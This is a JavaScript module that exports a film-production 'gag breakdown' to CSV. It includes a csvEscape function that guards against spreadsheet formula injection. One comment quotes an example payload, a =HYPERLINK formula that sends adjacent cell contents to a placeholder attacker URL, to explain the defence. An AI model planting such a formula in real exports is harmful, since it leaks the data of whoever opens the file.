/**
 * Excel-friendly CSV export for the Gag Breakdown page.
 *
 * Reuses the codebase's existing CSV-export convention (server/routes/orders.js
 * — the orders export): a UTF-8 BOM ('﻿') prefix so Excel renders £ and
 * accents, quote-every-field escaping with embedded quotes doubled, and \r\n
 * line endings. The download mechanism (Blob + anchor) mirrors the orders
 * export's CLIENT handler (DepartmentOrders.js handleExport).
 *
 * Client-side by design: the breakdown's row set the user sees includes the
 * CLIENT-ONLY "RA required" filter (GagBreakdown.visibleGags), which no server
 * query param expresses — so generating the CSV from the already-loaded,
 * already-filtered gags is the only way to export exactly what they see. It
 * also lets us import the SAME human-readable label + format helpers the UI
 * uses (never hand-rolled).
 */
import {
  GAG_STATUS_LABELS,
  TASK_PRIORITY_LABELS,
  DAY_NIGHT_LABELS,
  INT_EXT_LABELS,
} from '../constants/taskStatuses';
import { GAG_RA_BADGES } from '../constants/colors';
import { formatDate, toLocalISO } from './dateFormat';
import { formatCurrency } from './formatCurrency';

// Human header row — the labels the UI already uses for these fields.
export const GAG_EXPORT_HEADERS = [
  'Title', 'Sub-department', 'Owner', 'Status', 'Priority', 'Scenes',
  'Shoot date', 'Access date', 'Prep date', 'Strike date',
  'Day/Night', 'Int/Ext', 'Unit', 'Effect type', 'Estimated days',
  'Estimated cost (£)', 'Budgeted', 'RA status', 'Task progress',
];

/**
 * Escape one CSV field. Identical rule to the orders export
 * (server/routes/orders.js csvEscape): null/undefined → empty (unquoted);
 * every present value is wrapped in double quotes, with embedded quotes
 * doubled. Quoting every field keeps commas/quotes/newlines safe and matches
 * the established convention.
 *
 * MIRRORED IN server/routes/orders.js (csvEscape, in the /export handler) — the
 * server and client cannot import from each other in this codebase, so the two
 * copies are kept byte-identical by hand. Change one, change the other.
 *
 * CSV quoting alone does NOT stop formula injection: Excel/Sheets strip the
 * quotes on open and then EVALUATE any cell whose text begins with = + - @ (or
 * a leading tab/CR). A gag title or effect type of
 *   =HYPERLINK("https://attacker/?d="&A1,"Click")
 * would exfiltrate adjacent cells when a buyer opens the breakdown export.
 * Prefixing an apostrophe forces Excel to treat the cell as literal text.
 *
 * Plain numbers are deliberately exempt: a signed number ('-5', '+3') can only
 * ever evaluate to itself, and text-quoting them would break arithmetic over
 * the column (estimated_days here; unit_price/line_total on the server side).
 */
export function csvEscape(val) {
  if (val == null) return '';
  const str = String(val);
  // Leading whitespace is NOT protection: Excel trims the cell on open, so
  // ' =1+1' and '\n=1+1' reach formula context just like '=1+1'. Test the
  // first NON-WHITESPACE character. A bare leading \t / \r stays dangerous
  // in its own right (the original character class) so nothing that was
  // neutralised before stops being.
  const lead = str.replace(/^\s+/, '');
  const isPlainNumber = /^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$/.test(lead);
  const escaped = str.replace(/"/g, '""');
  if ((/^[=+\-@]/.test(lead) || /^[\t\r]/.test(str)) && !isPlainNumber) {
    return '"\'' + escaped + '"';
  }
  return '"' + escaped + '"';
}

/** One breakdown row → the ordered cell values matching GAG_EXPORT_HEADERS. */
function gagRow(g) {
  return [
    g.title,
    g.sub_department_name,
    g.owner_name,
    GAG_STATUS_LABELS[g.status] || g.status,
    TASK_PRIORITY_LABELS[g.priority] || g.priority,
    g.scenes_display,
    g.shoot_date ? formatDate(g.shoot_date) : null,
    g.location_access_date ? formatDate(g.location_access_date) : null,
    g.prep_date ? formatDate(g.prep_date) : null,
    g.strike_date ? formatDate(g.strike_date) : null,
    g.day_night ? (DAY_NIGHT_LABELS[g.day_night] || g.day_night) : null,
    g.int_ext ? (INT_EXT_LABELS[g.int_ext] || g.int_ext) : null,
    g.unit,
    g.primary_effect_type,
    g.estimated_days != null ? g.estimated_days : null,
    g.estimated_cost != null ? formatCurrency(g.estimated_cost) : null,
    g.budgeted ? 'Yes' : 'No',
    g.ra_status ? (GAG_RA_BADGES[g.ra_status]?.label || g.ra_status) : null,
    `${g.task_done ?? 0}/${g.task_total ?? 0}`,
  ];
}

/**
 * Build the full CSV text for a list of gags. Includes the UTF-8 BOM prefix,
 * \r\n line endings and a trailing newline — byte-for-byte the orders export's
 * output shape. An empty list yields the header row only.
 */
export function gagsToCsv(gags) {
  return rowsToCsv(GAG_EXPORT_HEADERS, (gags || []).map(gagRow));
}

/**
 * THE CSV text shape, for any header row + value rows: BOM, every row through
 * `csvEscape`, `\r\n` line endings, a trailing newline. 🔀 Split out of
 * `gagsToCsv` (byte-identical) 2026-09-27 when the hires export needed it.
 */
export function rowsToCsv(headers, valueRows) {
  const rows = [headers.map(csvEscape).join(',')];
  for (const values of valueRows) {
    rows.push(values.map(csvEscape).join(','));
  }
  return '﻿' + rows.join('\r\n') + '\r\n';
}

/** breakdown-<dept-or-production>-<YYYY-MM-DD>.csv (label slugified). */
export function gagExportFilename(label) {
  const date = toLocalISO(new Date());
  const slug = String(label || 'export').toLowerCase()
    .replace(/[^a-z0-9]+/g, '-').replace(/^-+|-+$/g, '') || 'export';
  return `breakdown-${slug}-${date}${CSV_EXT}`;
}

/**
 * Generate the CSV and trigger a browser download. Blob + anchor, matching the
 * orders export's client handler (DepartmentOrders.js).
 */
export function downloadGagsCsv(gags, label) {
  downloadTextFile(gagsToCsv(gags), gagExportFilename(label), CSV_MIME);
}

/**
 * THE CSV FILE'S IDENTITY — extension, MIME type and wording — in ONE place
 * (owner, 2026-10-28: the old "Excel" option was this same CSV text saved as
 * `.xls` / `application/vnd.ms-excel`, which Excel refuses to open without a
 * format-mismatch warning; it is now CSV everywhere). The next rename is a
 * one-line change here. The BOM in `rowsToCsv` stays: it is what makes Excel
 * read the UTF-8 (£, accents).
 *  - `CSV_LABEL`      — where a user PICKS a format (a radio, a hint).
 *  - `CSV_MENU_LABEL` — a menu item, next to "Export PDF".
 */
export const CSV_EXT = '.csv';
export const CSV_MIME = 'text/csv;charset=utf-8;';
export const CSV_LABEL = 'CSV (opens in Excel)';
export const CSV_MENU_LABEL = 'Export CSV';

/**
 * Save `text` as `filename` through a Blob + anchor — the orders export's
 * client mechanism. 🔀 Exported 2026-09-27 (with `csvEscape`) for the hires
 * pages' client-side export (`utils/hireListExport.js`) rather than a second
 * copy of either. `type` is the Blob MIME type.
 */
export function downloadTextFile(text, filename, type) {
  const blob = new Blob([text], { type });
  const url = window.URL.createObjectURL(blob);
  const a = document.createElement('a');
  a.href = url;
  a.download = filename;
  document.body.appendChild(a);
  a.click();
  document.body.removeChild(a);
  window.URL.revokeObjectURL(url);
}
